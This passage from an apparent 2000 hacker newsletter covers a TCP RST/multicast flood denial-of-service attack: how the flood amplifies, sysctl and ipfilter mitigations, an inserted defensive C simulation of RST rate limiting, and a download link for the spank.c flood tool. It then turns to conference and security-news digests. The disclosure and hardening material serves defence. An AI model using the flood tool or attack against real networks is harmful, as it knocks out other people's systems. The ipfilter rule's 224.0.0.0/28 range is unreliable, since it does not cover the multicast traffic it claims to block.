The filters that were presented at the beginning of this email will block all multicast packets that come out (and in) the tcp stack. I have been getting mailed a lot about this.
Here is why I said the previous statement. Receiving a packet with no flags is considered an illegal packet (obviously) and is often dumped; however, as we have seen in the past, illegal packets often wreak havoc and often go untested. There is very little that "raped.c" or "stream.c" actually showed as problems in the TCP/IP stacks. The true problem lies more in the effects of the response (caused by the attack). This is the same concept as the SYN floods of yesteryear, and the same type of thing will be done to handle it. The main difference is that it will be on a simpler note because there isn't much need for a "cookie" based system. One should just throttle the response of the reset packets, which in turn will help stop the storm that you generate, and in general harden the tcp/ip stack to behave the way it is supposed to.

The main effect of this attack is that you are shooting back RST+ACK's at all the spoofed hosts. Obviously, a lot of these hosts will not exist and you will get ICMP unreaches (as an example) bounced back at you. There are other possibilities as well, but unreach would be the most common (redirects might be common as well although i did not spend the time to analyze that). The ones that don't respond back may send you some packets back as well (depending on if the port was valid or not and what their firewall rules are). This type of attack is complicated by the multicasts, and the effect is amplified as well. All in all, it becomes very nasty very quick. Basically, this causes a nice little storm of packets, in the ideal case.

Note that I said ideal case in the previous paragraph. This is not always the observed behavior. It all depends on what is on the subnet, what type of packets are received, what rules and filters you have setup, and even the duration of the flood. It has been pointed out several times that the machine will go back to normal once the attack is stopped, which is exactly why something like ICMP_BANDLIM will work.

I have also been asked a lot about what this "bug" affects. I have seen it have effects on *BSD, Linux, Solaris, and Win* as far as OS's go. It has also seemed to affect some hubs, switches, routers, or gateways since entire subnets have "disappeared" briefly after the attack. The multicast attack seems to be more deadly to the network than the previous attack and its effects get amplified and even carried over to the rest of the network (bypassing secluded network bounds). I don't have more specifics on the systems affected because of the difficulty in testing it (and keeping the network up) since I do not have local access to the networks that I tested on, and remote access gets real ugly real fast.

Another possibility that has been suggested as to why some machines die is that the machine's route table is being blown up by the spoofed packets. Each spoofed packet has a different source address which means that a temporary route table entry is being created for each one. These entries take time to timeout. Use 'vmstat -m' and check the 'routetbl' field while the attack is going on. Route table entries can be controlled somewhat under freebsd with:

[root@solid]::[~] sysctl -a | fgrep .rt
net.inet.ip.rtexpire: 3600
net.inet.ip.rtminexpire: 10
net.inet.ip.rtmaxcache: 128

You can do the following, to help if the route table is at least part of the problem:

sysctl -w net.inet.ip.rtexpire=2
sysctl -w net.inet.ip.rtminexpire=2

Things that will help:

1. Drop all multicast packets (ingress and egress) that are addressed to the tcp stack because multicasts are not valid for tcp.
2. Extend bandwidth limiting to include RST's, ACK's and anything else that you feel could affect the stability of the machine.
3. Don't look for listening sockets if the packet is not a syn

I hope that this helps, or explains a little more at least.
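The three steps above, modelled in user space as an added example that is not code from lst's post, spank.c or any vendor's TCP stack: the victim's listener table (ports 22 and 80), the 10.x.y.z spoofed sources, the 192.168.0.1 target and the per-second RST budget are all constructed here, and the model keeps no connection table, so each packet is handled the way a spoofed flood packet that matches no connection would be.

```c
/* Added example: user-space model of the three hardening steps above.
 * Not code from lst's post, spank.c or any real TCP stack; addresses,
 * listener table and RST budget are constructed for the simulation. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define TH_SYN 0x02
#define TH_RST 0x04
#define TH_ACK 0x10

typedef enum { ACT_DROP_SILENT, ACT_SEND_RST, ACT_DELIVER } action_t;

struct pkt {
    uint32_t saddr, daddr;  /* IPv4 addresses, host byte order */
    uint16_t dport;
    uint8_t  flags;
    uint32_t tstamp;        /* whole seconds, drives the limiter */
};

/* Per-second RST budget: ICMP_BANDLIM's idea applied to RSTs (step 2). */
struct rst_limiter {
    uint32_t window_start;
    unsigned sent_in_window;
    unsigned max_per_second;
};

/* 224.0.0.0/4 is the entire IPv4 multicast (class D) range. */
static bool is_multicast(uint32_t a) { return (a & 0xF0000000u) == 0xE0000000u; }

static bool rst_allowed(struct rst_limiter *l, uint32_t now)
{
    if (now != l->window_start) {       /* new second: reset the budget */
        l->window_start = now;
        l->sent_in_window = 0;
    }
    if (l->sent_in_window >= l->max_per_second)
        return false;
    l->sent_in_window++;
    return true;
}

static bool port_is_listening(uint16_t port, const uint16_t *lst, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (lst[i] == port) return true;
    return false;
}

/* Decision for one inbound segment that matches no existing connection. */
action_t tcp_input(const struct pkt *p, const uint16_t *lst, size_t nlst,
                   struct rst_limiter *lim)
{
    /* Step 1: multicast is never valid for TCP; drop, no response. */
    if (is_multicast(p->saddr) || is_multicast(p->daddr))
        return ACT_DROP_SILENT;
    /* No flags at all is illegal, and a RST is never answered with a RST. */
    if (p->flags == 0 || (p->flags & TH_RST))
        return ACT_DROP_SILENT;
    /* Step 3: a non-SYN cannot open a connection, so skip the listener
     * lookup entirely; the RFC 793 RST reply goes through the limiter. */
    if (!(p->flags & TH_SYN))
        return rst_allowed(lim, p->tstamp) ? ACT_SEND_RST : ACT_DROP_SILENT;
    /* SYN to a closed port: throttled RST. SYN to an open port: deliver. */
    if (!port_is_listening(p->dport, lst, nlst))
        return rst_allowed(lim, p->tstamp) ? ACT_SEND_RST : ACT_DROP_SILENT;
    return ACT_DELIVER;
}

/* Constructed victim with ports 22 and 80 open; fresh budget of one RST. */
action_t classify(uint32_t saddr, uint32_t daddr, uint16_t dport, uint8_t flags)
{
    const uint16_t lst[] = { 22, 80 };
    struct rst_limiter lim = { 0, 0, 1 };
    struct pkt p = { saddr, daddr, dport, flags, 1 };
    return tcp_input(&p, lst, 2, &lim);
}

/* Replay the shape of stream.c's loop for its first 1024 iterations (its
 * !(i & 0x4FF) test fires every 256 packets: one SYN from a fresh spoofed
 * source, then ACKs) within a single second against port 80, and return
 * how many RSTs the stack would actually emit under the budget. */
unsigned simulate_flood(unsigned npkts, unsigned max_rst_per_sec)
{
    const uint16_t lst[] = { 22, 80 };
    struct rst_limiter lim = { 0, 0, max_rst_per_sec };
    uint32_t src = 0;
    unsigned rsts = 0;
    for (unsigned i = 0; i < npkts; i++) {
        struct pkt p = { 0, 0xC0A80001u /* 192.168.0.1 */, 80, TH_ACK, 1 };
        if (i % 256 == 0) {
            src = 0x0A000001u + i;      /* constructed 10.x.y.z source */
            p.flags = TH_SYN;
        }
        p.saddr = src;
        if (tcp_input(&p, lst, 2, &lim) == ACT_SEND_RST)
            rsts++;
    }
    return rsts;
}
```

With a budget of 200 RSTs per second, a 1024-packet burst yields 200 RST replies instead of 1020, which is the reduction in the reflected storm the post describes.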
---------------------------------------------------
Temporary remedy
---------------------------------------------------

If you use ipfilter, this MAY help you, but the issue is quite a bit different than the previous issue.

-- start rule set --
block in quick proto tcp from any to any head 100
block in quick proto tcp from 224.0.0.0/28 to any group 100
pass in quick proto tcp from any to any flags S keep state group 100
pass out proto tcp from any to any flags S keep state
pass in all
-- end rule set --

optionally, a rule like the following could be inserted to handle outgoing packets (if they send from the firewall somehow) but you have bigger problems than the attack if that is the case.

-- start additional rule --
block out proto tcp from any to 224.0.0.0/28
-- end additional rule --

That will help you "stop" the attack (actually it will just help minimize the effects), although it will still use some CPU.

Note: If you use IPFW, there is no immediate way to solve this problem due to the fact that it is a stateless firewall. If you are getting attacked, then temporarily use ipfilter (or any other state based firewall) to stop it. Otherwise, wait for vendor patches or read more about the explanation for other possible workarounds.

FreeBSD "unofficial patch" by Don Lewis:
http://solid.ncsa.uiuc.edu/~liquid/patch/don_lewis_tcp.diff

-----------------------
Conclusion
-----------------------

This bug was found in testing. It seems a bit more lethal than the previous and should be addressed as such. Patches should be available now, but I do not follow all the platforms.

--------------------
References
--------------------

This was done independently, although some of the analysis and reverse engineering of concept was done by other people. As a result, I would like to give credit where credit is due.
The following people contributed in some way or another:

Brett Glass <brett@lariat.org>
Alfred Perlstein <bright@wintelcom.net>
Warner Losh <imp@village.org>
Darren Reed <avalon@coombs.anu.edu.au>
Don Lewis <Don.Lewis@tsc.tdk.com>

Also, I would like to send shouts out to w00w00 (http://www.w00w00.org)

-------------------
Attached
-------------------

These programs are for the sake of full disclosure, don't abuse them. Spank was written with libnet, so you will need to obtain that as well. You can find that at http://www.packetfactory.net/libnet

For an "unofficial" patch: http://www.w00w00.org/files/spank/don_lewis_tcp.diff

For spank.c: http://www.w00w00.org/files/spank/spank.c

@HWA

15.0 Canadian Security Conference announcement: CanSecWest.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Canc0n may have failed as the first security/hacker con in Canada, so here is a promising-sounding event pulled off by professional boys.

CanSecWest/core00
April 19th, 20th, 21st, 2000
Vancouver, BC, Canada.

"Every IT/Security person who can attend, should attend. CanSecWest/core00 promises to be the hardest hitting, most informative, and useful network security event ever held in Canada."

Website: http://www.dursec.com/

Some high profile speakers are scheduled to appear. Noted speakers include:

Ron Gula - Network Security Wizards
Famous ex-U.S. government computer security analyst, who founded Network Security Wizards and authored the Dragon intrusion detection system. Ron will discuss intrusion detection sensors, drawing upon his large base of practical experience in the area.

Ken Williams - Ernst & Young
The creator of famous hacker super-site: packetstorm.securify.com. The infamous "tattooman" from genocide2600, now of Ernst & Young's security team, will give some pointers on NT security.

Marty Roesch - www.hiverworld.com
Author of the popular "snort" intrusion detection system and senior software engineer on Hiverworld's "ARMOR" intrusion detection system. He will talk about good ways to "snort" out intruders.

rain.forest.puppy - www.wiretrip.net
Famous security paper author - one of those "he could take over the internet if he felt like it" kind of guys will amaze and amuse with some 0 day exploit training.

Theo DeRaadt - OpenBSD
The leader of the OpenBSD Secure operating system project will talk about securing operating systems.

Fyodor - www.insecure.org
Author of the award winning Nmap Security Scanner. He also maintains the popular Insecure.Org web site, the "Exploit World" vulnerability database, and several seminal papers describing techniques for stealth port scanning and OS detection via TCP/IP stack fingerprinting. Fyodor will demonstrate the use of Nmap to identify subtle security vulnerabilities in a network.

Max Vision - www.maxvision.net - www.whitehats.com
Security consultant and author of the popular ArachNIDS (www.whitehats.com) public intrusion signature database will discuss intrusion forensics, attack fakes, attacker verification, and retaliation.

Dragos Ruiu - dursec.com
Tutorial author, founder of NETSentry Technology, former MPEG and ATM expert for HP and dursec.com founder; Dragos will be giving the first day's training. Dragos has instructed tens of thousands of people about digital video and high speed computer networks in highly rated HP training courses delivered in over 60 cities world-wide. A long-time security expert and instructor, his course material will explain this intricate subject through approachable explanations with applications and real-world examples that will help you apply this important knowledge to your computers immediately.
@HWA

16.0 Security Portal review Jan 16th
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

******* Vendor Corner *******

Entrust - We Bring Trust to e-Business

Entrust Technologies lets you tap into new global e-business markets by securing applications for Web, e-mail, ERP, VPN, desktop files and folders, as well as a comprehensive suite of solutions to deliver trusted e-business transactions to the exploding wireless Internet appliance market. For more information on this complete range of security solutions for e-business visit http://www.entrust.com. Come see us at RSA 2000, San Jose, CA, Jan. 16-20, 2000, San Jose McEnery Convention Center, Booth #416.

******* What's new with SecurityPortal.com *******

Linux vs Microsoft: Who solves security problems faster?

Does Open Source plug security holes quickly? We took a look at the security advisories issued by Microsoft and Red Hat in 1999 to gauge the time lag between the point of a "general community awareness" of a security problem and the point at which a patch was released. Find out who won here.
<http://securityportal.com/direct.cgi?/cover/coverstory20000117.html>

SecurityPortal.com is proud to sponsor Techno-Security 2000
April 16-19, 2000
Wyndham Myrtle Beach Resort
Myrtle Beach, South Carolina

This one-of-a-kind conference is intended for private industry, government, law enforcement decision makers and technical experts interested in, or involved with, information security, operations security, high tech crime and its prevention.

Featured speakers include: Bill Murray, Dr. Dorothy Denning, Bill Crowell, Chris Goggans, Kevin Manson, Rick Forno, Dr. Myron Cramer, Don Delaney, Dr. Terry Gudaitis, Matt Devost and many more...

This year's high intensity tracks will include: Hacker Profiling, Intrusion Detection, Beginner & Advanced Computer Forensics, e-Commerce Security, Body Armor for Cyber-Cops, Information Terrorism, Live Vulnerability Testing, Incident Response, Tools for Protecting the Enterprise, PKI, plus many more.

Registration is available on-line at: www.TheTrainingCo.com or call 410.703.0332 for more information.

******* Vendor Corner *******

Sponsored by Trend Micro, Inc. http://www.antivirus.com

ScanMail for Lotus Notes is a native Domino server application.
- First product to provide complete, scalable virus protection for Lotus Notes.
- Detects and removes viruses hidden in databases and email attachments.
- Provides real-time scanning of incoming and outgoing emails through the Domino server.
- Infection notification and provides a Virus Activity Report to assist in tracing and securing virus point of entry.
- Multi-threaded architecture delivers high performance.
- SmartScan eliminates redundant scanning to maximize server efficiency.

******* Top News *******

January 17, 2000

Welcome to SecurityPortal.com - The focal point for security on the Net.

Biggest news of last week was probably the new encryption export regulations released by the U.S. We will let you know when our lawyers get through them.
Recent postings in our top news <http://www.securityportal.com/framesettopnews.html>:

Jan 17, 2000

MSNBC: Microsoft certificate bug crashes Netscape browser
<http://msnbc.com/news/357775.asp>
- IIS 4 does not correctly support 56-bit certificates, so when Communicator tries to step up to the highest level of security (128-bit key length certificates), it simply crashes with an invalid page fault in NETSCAPE.EXE

ZDNet: Computer glitch gives Canadian Microsoft Web site
<http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2422989,00.html?chkpt=p1bn>
- a glitch at Network Solutions briefly gave a Canadian ownership of Microsoft.com and Yahoo.com over the weekend

Jan 15, 2000

ABCNews: Online Credit Hacker May Be Out for Profit
<http://www.apbnews.com/newscenter/internetcrime/2000/01/14/hack0114_01.html>
- While a computer hacker maintains that he stole credit card numbers from an online retailer as revenge for poor service and a couple of broken CDs, a security expert believes that Maxus is actually a two-man team in Russia engaged in a well-organized credit card fraud

FCW: FBI beefs up cyberagent squads nationwide
<http://www.fcw.com/fcw/articles/web-fbi-01-14-00.asp>
- The FBI plans to reinforce its mission to counter cyberattacks with the formation of new investigative teams specializing in computer intrusions and attacks at all 56 of its field offices around the country. The agency also plans to assign at least one computer forensics examiner to each field office

ZDNet: Network Associates divides itself
<http://www.zdnet.com/zdnn/stories/news/0,4586,2422403,00.html?chkpt=zdnntop>
- Convinced that six smaller companies can compete better than one big one, Network Associates gives up on its integrated security strategy

ZDNet: How to steal 2,500 credit cards
<http://www.zdnet.com/zdnn/stories/news/0,4586,2422687,00.html?chkpt=zdnntop>
- Just how easy is it to steal credit card numbers on the Internet? On Thursday, MSNBC was able to view nearly 2,500 credit card numbers stored by seven small e-commerce Web sites within a few minutes, using elementary instructions provided by a source. In all cases, a list of customers and all their personal information was connected to the Internet and either was not password-protected or the password was viewable directly from the Web site

Jan 14, 2000

IDG: U.S., EU to meet on data privacy
<http://www.idg.net/idgns/2000/01/14/USEUToMeetOnData.shtml>
- The U.S. government has invited representatives from European Union countries to Washington D.C. next week to work out an agreement on data privacy before their self-imposed March deadline

CNet: Security software firm Tripwire plans Linux push
<http://news.cnet.com/news/0-1003-200-1522536.html?dtn.head>
- Security software maker Tripwire is planning to unveil a major expansion into new types of computing products, especially those running on the Linux operating system

ZDNet: Crypto compromise a lawyers' delight
<http://www.zdnet.com/zdnn/stories/news/0,4586,2422348,00.html?chkpt=zdhpnews01>
- It's supposed to ease encryption export controls. But have the Clinton Administration's new regs instead created a legal maze?

CA: COMPUTER ASSOCIATES WARNS OF A NEW VARIANT OF THE NEWAPT WORM CALLED NEWAPTd
<http://www.ca.com/press/2000/01/newapt_d.htm>
- Computer Associates International, Inc. yesterday warned computer users of a worm called "NewApt.D," a new variant belonging to the NewApt family of Win32 worms. The worm uses e-mail and executable attachments to propagate from one computer to another. This worm has been reported in the wild. The original NewApt worm was first detected in December 1999

Jan 13, 2000

CA: Virus Alert: COMPUTER ASSOCIATES DISCOVERS A NEW WORM CALLED Plage2000
<http://www.ca.com/press/2000/01/plage2000.htm>
- Computer Associates International, Inc. today warned computer users of a new worm called Plage2000 which could threaten computer email systems as well as eBusiness infrastructures. This worm has been reported to be in the wild by CA customers. CA's antivirus research team is analyzing this worm and will provide more details as they are determined

InternetNews: Circle Tightens Around Online Credit Card Thief
<http://www.internetnews.com/ec-news/article/0,1087,4_281801,00.html>
- Law enforcement officials may be closing in on Maxus, the Russian cracker who stole 300,000 credit card numbers from e-tailer CD Universe last month and dispensed them for free to visitors of his Web site

Microsoft Bulletin: Patch Available for Spoofed LPC Port Request Vulnerability
<http://securityportal.com/topnews/ms00-003.html>
- The LPC vulnerability could allow a user logged onto a Windows NT 4.0 machine from the keyboard to become an administrator on the machine

Yahoo: NSA Selects Secure Computing to Provide Type Enforcement on Linux
<http://biz.yahoo.com/prnews/000113/ca_secure__1.html>
- Secure Computing Corporation today announced that it has been awarded a sole source contract by the National Security Agency (NSA) to develop a Secure Linux Operating System (OS). This contract calls for Secure Computing to apply its patented Type Enforcement(TM) technology, to develop a robust and secure Linux platform. This award furthers the goal of Secure to pursue and acquire contracts that will provide enabling technologies to both the Federal government infrastructure as well as commercial electronic business applications

ComputerWorld: Teens steal thousands of Net accounts
<http://www.computerworld.com/home/print.nsf/idgnet/000113DD2E>
- A group of teen-age computer crackers allegedly used thousands of stolen Internet accounts to probe the networks of two national nuclear weapons laboratories, according to law enforcement authorities in California

Commerce Announces Streamlined Encryption Export Regulations
<http://204.193.246.62/public.nsf/docs/60D6B47456BB389F852568640078B6C0>
- The U.S. Department of Commerce Bureau of Export Administration (BXA) today issued new encryption export regulations which implement the new approach announced by the Clinton Administration in September

InfoWorld: Oracle turns focus to security with Release 2 of 8i database
<http://infoworld.com/articles/ec/xml/00/01/12/000112ecoracle.xml>
- With an eye on the complex security needs of large electronic-commerce sites, Oracle next week will introduce Release 2 of its flagship database, Oracle 8i, at the RSA Conference 2000 in San Jose, Calif

FCW: Army establishes Infowar DMZ
<http://www.fcw.com/fcw/articles/web-dmz-01-12-00.asp>
- The Army plans to establish network security demilitarized zones (DMZs) at all its bases worldwide as part of a plan to beef up its cyberdefenses against network intrusions and attacks

Jan 12, 2000

FSecure: First Windows 2000 Virus Found
<http://www.fsecure.com/news/2000/20000112.html>
- F-Secure Corporation, a leading provider of centrally-managed, widely distributed security solutions, today announced the discovery of the first Windows 2000 virus. Windows 2000 is the upcoming new operating system from Microsoft, due to be released later this year. The new virus is called Win2K.Inta or Win2000.Install. It appears to be written by the 29A virus group. It operates only under Windows 2000 and is not designed to operate at all under older versions of Windows

Kurt's Closet: Some thoughts on (network) intrusion detection systems
<http://securityportal.com/direct.cgi?/closet/closet20000112.html>
- Kurt makes the case for the necessity of emulated intelligence within intrusion detection systems and reviews some current research projects in this field

RSA and Lotus Team to Provide Integrated Security for Lotus Notes and Domino R5
<http://www.rsasecurity.com/news/pr/000111-3.html>
- Lotus to integrate RSA's KEON public key infrastructure software into Notes and Domino R5

ZDNet: Data thief threatens to strike again
<http://www.zdnet.com/zdnn/stories/news/0,4586,2420863,00.html?chkpt=zdhpnews01>
- An e-mail author claiming to be the thief who released as many as 25,000 stolen credit card numbers earlier this month told NBC News he'll soon start distributing more card numbers on a new Web site

Wired: Domains Hijacked from NSI
<http://www.wired.com/news/politics/0,1283,33571,00.html>
- Network Solutions' administrative policies are once again being blamed for Internet domain hijackings that took at least brief control over some major Web domains

Jan 11, 2000

InternetNews: Cybercash Disputes Hacker's Claim
<http://www.internetnews.com/ec-news/article/0,1087,4_279541,00.html>
- Cybercash Inc. is disputing an 18-year-old Russian cracker's claims that the company's credit card verification system was penetrated, resulting in the theft of thousands of credit card numbers from an online music store

FoxNews: Designed for Destruction
<http://www.foxnews.com/vtech/011000/virus.sml>
- Deliberately destructive viruses are on an upward trend, according to Symantec's Antivirus Research Center (SARC). Approximately 10 percent of 1993 viruses were deliberately destructive, but in 1997 that number rose to 35 percent. Often masquerading as innocuous e-mail, games or even fixes to real problems like the Y2K bug, today's viruses are more insidious than their counterparts were only a few years ago

Wired: Crack Exposes Holes in the Web
<http://www.wired.com/news/technology/0,1282,33563,00.html>
- There are Web site cracks, there are break-ins, and there are thefts. But now and then one rises above the fray to teach a sudden lesson about all things Internet

NWFusion: Win 2000 VPN technology causes stir
<http://www.nwfusion.com/news/2000/0110vpn.html>
- When it ships next month, Microsoft's Windows 2000 will come with technology for setting up an IP Security-based virtual private network. The question is: Will established VPN products from other vendors work with Microsoft's technology?

New Internet Explorer vulnerability discovered by Guninski
<http://securityportal.com/list-archive/bugtraq/2000/Jan/0091.html>
- Georgi Guninski posted a new advisory concerning a new IE 5 security vulnerability - circumventing Cross-frame security policy and accessing the DOM of "old" documents. This vulnerability can potentially allow access to local data. No response from Microsoft yet

Securing E-Business in the New Millennium
<http://securityportal.com/direct.cgi?/topnews/ebusiness20000111.html>
- this article states the real threat will continue to be from within, and provides advice on the primarily low tech preventative measures any organization should take

Jan 10, 2000

Sophos: Virus found on magazine CD ROM
<http://www.sophos.com/devreview.html>
- The WM97/Ethan virus was accidentally distributed on the December 1999 cover CD ROM of Developers Review magazine. The CD ROM, entitled Bonus CD - Issue 13 - December 1999, contains one file infected by the WM97/Ethan virus: POPKIN\WHATSNEW.DOC

Cisco: Field Notice: Cisco Secure PIX Firewall Software Version 4.43 Deferral
<http://www.cisco.com/warp/public/770/fn10231.html>
- Any PIX Firewall on which version 4.43 software is present will continuously reboot. No other released versions of PIX Firewall are affected

******* What's new with SecurityPortal.com *******

Email Bombing

Denial of Service (DoS) attacks, strange variants in the computer crime arena, often occur without clear economic motive. Usually, they arise from anarchistic impulses within the computer underground. And, email bombing is one of the easiest DoS attacks for the Huns of the Internet to perfect. Read the story here <http://securityportal.com/direct.cgi?/topnews/ebomb20000114.html>.

Tell us how we are doing. Send any other questions or comments to webmaster@securityportal.com.

Jim Reavis
SecurityPortal.com - The focal point for security on the Net
jreavis@SecurityPortal.com

@HWA

17.0 Security Portal review Jan 24th
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

******* Vendor Corner *******

Write Your Information Security Policies In A Day!

INFORMATION SECURITY POLICIES MADE EASY is a kit, text and CD, of 1000+ already-written security policies by internationally-known consultant Charles Cresson Wood. ISPME has JUST BEEN UPDATED and is now available in Version 7! ISPME v7 is the most comprehensive collection of policies available covering the latest technology developments and infosec topics. Each of these policies is accompanied by commentary detailing policy intention, audience, and the circumstances where it applies. Save weeks of time and thousands of dollars developing policies for information security manuals, systems standards, etc. with no consultant fees.
Visit us at http://www.baselinesoft.com/ for more information.

******* What's new with SecurityPortal.com *******

The Clock Strikes Midnight for RSA

In a date more feared by RSA Security than Y2K, the patent for the venerable RSA data encryption algorithm will expire on September 20th of this year. No longer will RSA be able to charge royalties for the algorithm, first published by Ron Rivest, Adi Shamir and Leonard Adleman in 1977 and patented in 1983. After patent expiration, the algorithm will become part of the public domain, and companies will be free to incorporate the algorithm into their products without paying RSA any type of royalty or licensing fee. Although the demise of a 17 year patent for widely used technology is a big deal, there is also a distinct possibility that, like Y2K, it will turn out to be a non-event due to the momentum of the established security industry. Read the full story here.
<http://securityportal.com/direct.cgi?/cover/coverstory20000124.html>

******* Vendor Corner *******

NOW from Entrust Technologies: All the power of proven Entrust solutions in a managed service.

With Entrust@YourService, you're choosing:
* the leader in bringing trust to e-business
* a solution that will evolve with your e-business needs
* a single, reliable trust backbone for all that you do

Entrust@YourService is the choice for companies like yours that need to secure e-business quickly and reliably - without losing focus on what you do best. Click for more info: http://www.entrust.com/choice2

******* Top News *******

January 24, 2000

Welcome to SecurityPortal.com - The focal point for security on the Net.

Recent postings in our top news <http://www.securityportal.com/framesettopnews.html>:

Jan 24, 2000

IDG: NEC to unveil world's strongest encryption system
<http://www.idg.net/idgns/2000/01/21/NECToUnveilWorldsStrongestEncryption.shtml>
- NEC says it will unveil a new encryption technology on Monday that it claims to be the world's strongest

ZDNet: Mitnick: I was manipulated
<http://www.zdnet.com/zdnn/stories/news/0,4586,2425686,00.html?chkpt=zdnntop>
- Just freed from prison Friday, notorious hacker Kevin Mitnick slammed prosecutors and a New York Times reporter for allegedly treating him unjustly in the court and in the media over the past six years

Jan 21, 2000

Microsoft: Patch Available for "RDISK Registry Enumeration File" Vulnerability
<http://www.microsoft.com/Security/Bulletins/ms00-004.asp>
- Microsoft has released a patch that eliminates a security vulnerability in an administrative utility that ships with Microsoft® Windows NT® 4.0, Terminal Server Edition. The utility creates a temporary file during execution that can contain security-sensitive information, but does not appropriately restrict access to it. As a result, a malicious user on the terminal server could read the file as it was being created.

CNN: Microsoft vows security commitment on Windows 2000
<http://www.cnn.com/2000/TECH/computing/01/20/security.win2k.idg/index.html>
- Microsoft is pledging a firm commitment to security with measures such as equipping its upcoming Windows 2000 operating system with 128-bit encryption and interacting with users and rival vendors to detect software breaches and bugs, a high-ranking company official said in a keynote speech at the RSA Conference 2000 show here Tuesday.

iDEFENSE and Internet Security Systems Form Strategic Alliance
<http://www.iss.net/cgi-bin/dbt-display.exe/db_data/press_rel/release/012100142.plt>
- Infrastructure Defense, Inc. (iDEFENSE), a leading intelligence and risk management consulting company, and Internet Security Systems (ISS) (Nasdaq: ISSX), a leading provider of security management solutions for e-business, announced today a strategic agreement to integrate iDEFENSE and ISS capabilities, providing customers with an expanded line of information security offerings. As a result of the agreement, iDEFENSE and ISS will share expertise, data and resources as well as resell each company's products and services to respective customers

ZDNet: Hacker Mitnick to be released Friday
<http://www.zdnet.com/zdnn/stories/news/0,4586,2425165,00.html?chkpt=zdhpnews01>
- Come Friday, for the first time since 1995, Kevin Mitnick will be free. Will he hack again?

OpenBSD Security Advisory: procfs
<http://www.openbsd.org/errata.html>
- Systems running with procfs enabled and mounted are vulnerable to having the stderr output of setuid processes directed onto a pre-seeked descriptor onto the stack in their own procfs memory

FreeBSD Security Advisory: make
<http://www.fear.pl/advisory/fid1/main_eng.htm>
- make uses the temporary file in an insecure way, repeatedly deleting and reusing the same file name for the entire life of the program. This makes it vulnerable to a race condition wherein a malicious user could observe the name of the temporary file being used, and replace the contents of a later instance of the file with her desired commands after the legitimate commands have been written

Jan 20, 2000

Currents: Virus Attacks Cost 12Bil
<http://www.currents.net/newstoday/00/01/20/news14.html>
- Virus attacks cost organizations a total of $12.1 billion during 1999, according to a report released today.
Released by Computer Economics, the report said that over the last three years there has been a major programming shift as viruses have become far more malicious and specifically designed for destruction and damage UnionTribune: Global Health hit by hacker <http://www.uniontrib.com/news/computing/20000120-0010_1b20health.html> - A Poway company selling health products over the Internet was the apparent victim of a "hacker," who took information containing customer names and credit-card numbers and posted them on a Web site. The incident occurred Monday when someone accessed a little-used Web site kept by Global Health Trax, posted information that had been deleted months ago, then tipped off a reporter for MSNBC about it Wired: Say Hello to the NSA <http://www.wired.com/news/politics/0,1283,33776,00.html> - It wasn't hard to do if you were at the RSA Security conference this week in San Jose. The National Security Agency was there, like any other exhibitor, to be seen and promote technology partnerships Microsoft Bulletin: Malformed Conversion Data Vulnerability <http://securityportal.com/topnews/ms00-002.html> - Microsoft has released a patch that eliminates a security vulnerability in a utility that converts Japanese, Korean and Chinese Microsoft Word 5 documents to more-recent formats. A patch is available for the buffer overflow problem Computer Currents: Symantec Gets Anti Virus Patent <http://www.computercurrents.com/newstoday/00/01/20/news3.html> - Symantec has announced that a key technology in its Striker anti-virus engine has been granted patent rights by the US Patent and Trademark office. 
The firm said that the next-generation technology enables the Striker engine to detect complex polymorphic, or self-mutating, viruses much more rapidly than traditional anti-virus engines Wired: Clinton Favors Computer Snooping <http://wired.com/news/business/0,1367,33779,00.html> - The Clinton administration wants to be able to send federal agents armed with search warrants into homes to copy encryption keys and implant secret back doors onto computers Computer Currents: Encryption Challenge Beaten <http://www.computercurrents.com/newstoday/00/01/19/news6.html> - A 56-bit security challenge laid down by CS Communication & Systemes in March, 1999, has been cracked in just two months by a team of students working with no less than 38,000 Internet users around the world TechWeb: Washington Rep: Encryption Rules Need Work <http://www.techweb.com/wire/story/TWB20000119S0013> - interview with Rep Bob Goodlatte. "We think it is almost, but not quite, a 180-degree turn from [previous policy]," Goodlatte said. "But the problem is the implementation of it. They've made the application process [for encryption export] complex and cumbersome." The Fastest Growing Crime in America: Identity Theft <http://securityportal.com/direct.cgi?/topnews/identity20000120.html> - One of the nation's fastest-growing crimes is identity theft. Using a variety of methods, criminals obtain key pieces of a person's identity and fraudulently use that information for various illegal reasons. Some law enforcement officials estimate about 3,000 cases of identity theft a day within the United States Jan 19, 2000 InformationWeek: Security Vendors Intro Wireless Tools <http://www.informationweek.com/story/IWK20000119S0002> - With the ongoing convergence of Internet and wireless devices such as cell phones and personal digital assistants, there's heightened awareness of security issues among vendors and customers. 
At the RSA 2000 Security Convention in San Jose, Calif., this week, vendors addressed the issue with a variety of new products and alliances InformationWeek: Cisco To Acquire Two VPN Vendors <http://www.informationweek.com/story/IWK20000119S0003> - Looking to give users options for building virtual private networks, Cisco Systems today disclosed plans to supplement its product portfolio by buying VPN vendors Altiga Networks and Compatible Systems for a combined 567 million in stock Canoe: Dodging a hack attack <http://www.canoe.ca/TechNews0001/19_connect.html> - Just how safe is your data on the Net? The stories are scary: Just before Christmas, a 14-year-old kid was arrested in Toronto after hacking a company's site and changing the passwords. He was arrested when he showed up to collect his $5,000 ransom. A couple of weeks later, a Russian hacker, 'Maxim,' held 300,000 credit card numbers hostage, demanding CDUniverse pay him US$100,000. To make good on his threat, he started posting the information publicly. So far, CDUniverse hasn't paid. And Monday, computer hackers vandalized the 'Thomas' Web site of the U.S. Library of Congress NAI: W32/Ska2K.worm virus, Risk Low <http://vil.nai.com/vil/wm10543.asp> - This edition of the worm is only a minor variation of the original first identified in February 1999. This worm is detected with current DAT files. The file may be received by email with a size of 10,000 bytes. The worm if run will patch WSOCK32.DLL to promote distribution by email on the host system if the email application supports SMTP email communication. 
